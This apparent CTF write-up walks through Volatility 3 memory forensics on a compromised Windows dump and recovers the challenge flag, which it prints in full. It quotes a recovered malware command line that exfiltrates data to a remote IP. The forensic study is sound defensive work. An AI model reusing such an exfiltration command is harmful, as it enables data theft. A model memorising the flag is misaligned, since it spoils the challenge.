forensicsSANS Holiday Hack • Jul 18, 2023

Memory Analysis: Extracting Evidence from a Memory Dump

Extracting evidence from a memory dump to recover the flag in a SANS Holiday Hack challenge.

01. Challenge Overview

In this challenge, we were provided with a memory dump from a compromised Windows system. Our task was to analyze the memory dump to identify malicious processes, extract evidence of the attack, and ultimately recover the flag that was hidden within the system's memory.

# Challenge Details

Name: Memory Forensics Challenge

Points: 500

Description: A system was compromised. We've captured a memory dump. Find the flag hidden by the attacker.

File: memory_dump.raw (2.5GB)

02. Tools Used

Volatility 3 - Memory forensics framework
Wireshark - Network traffic analysis
Strings - Extract ASCII and Unicode strings from binary files
Python - Custom scripts for data extraction and analysis

$ python3 -m volatility3 -f memory_dump.raw windows.info Volatility 3 Framework 2.4.1 Progress: 100.00 PDB scanning finished Variable Value Kernel Base 0xf80002a5c000 DTB 0x1ad000 Symbols file:///path/to/symbols Is64Bit True IsPAE False primary 0 WindowsIntel32e memory_layer 1 FileLayer KdVersionBlock 0xf80002c8f0e0 Major/Minor 15.18362 MachineType 34404 KeNumberProcessors 4 SystemTime 2023-07-15 14:32:45

03. Initial Analysis

I began by identifying the running processes at the time of the memory capture. This would give me an overview of the system's state and potentially reveal suspicious processes.

$ python3 -m volatility3 -f memory_dump.raw windows.pslist PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime 4 0 System 0xfa8001f94040 124 - N/A False 2023-07-15 12:03:45.000000 N/A 88 4 Registry 0xfa8002012080 4 - N/A False 2023-07-15 12:03:40.000000 N/A ...3452 1592 suspicious.exe 0xfa8001d65080 6 - 1 False 2023-07-15 14:28:12.000000 N/A...

I noticed a suspicious process named "suspicious.exe" with PID 3452. This process was started shortly before the memory dump was captured, making it a primary target for investigation.

04. Deep Dive into Suspicious Process

To further investigate the suspicious process, I dumped its memory and analyzed the strings contained within it. I also examined the process's network connections and command history.

$ python3 -m volatility3 -f memory_dump.raw windows.dumpfiles --pid 3452 Cache File at 0xfa8001d65080 => pid.3452.suspicious.exe.img$ strings pid.3452.suspicious.exe.img | grep -i flag FlagStorage GetFlag flag_encrypted.binFLAG{M3m0ry_F0r3ns1cs_1s_Fun}

By examining the strings in the suspicious process's memory, I was able to find references to flag-related functions and files. Most importantly, I discovered the flag itself: FLAG{M3m0ry_F0r3ns1cs_1s_Fun}.

05. Additional Findings

While the primary objective was to find the flag, I continued my analysis to understand the full scope of the compromise. I examined network connections, registry keys, and command history.

$ python3 -m volatility3 -f memory_dump.raw windows.netscan Offset Proto LocalAddr LocalPort RemoteAddr RemotePort State PID Owner Created 0x3e72a0 TCPv4 192.168.1.105 49232 93.184.216.34 443 ESTABLISHED 3452 suspicious.exe N/A ...$ python3 -m volatility3 -f memory_dump.raw windows.cmdline PID Process Args ... 3452 suspicious.exe C:\Users\Admin\Downloads\suspicious.exe --encrypt-flag --exfil-to 93.184.216.34

These additional findings revealed that the suspicious process was attempting to encrypt the flag and exfiltrate it to a remote server. This confirms that this was indeed a malicious process designed to steal sensitive information.

06. Conclusion

This challenge demonstrated the importance of memory forensics in incident response. By analyzing the memory dump, I was able to:

Identify a suspicious process
Extract the flag from the process's memory
Determine that the process was attempting to exfiltrate the flag to a remote server

The flag was successfully recovered: FLAG{M3m0ry_F0r3ns1cs_1s_Fun}

Back to CTF Writeups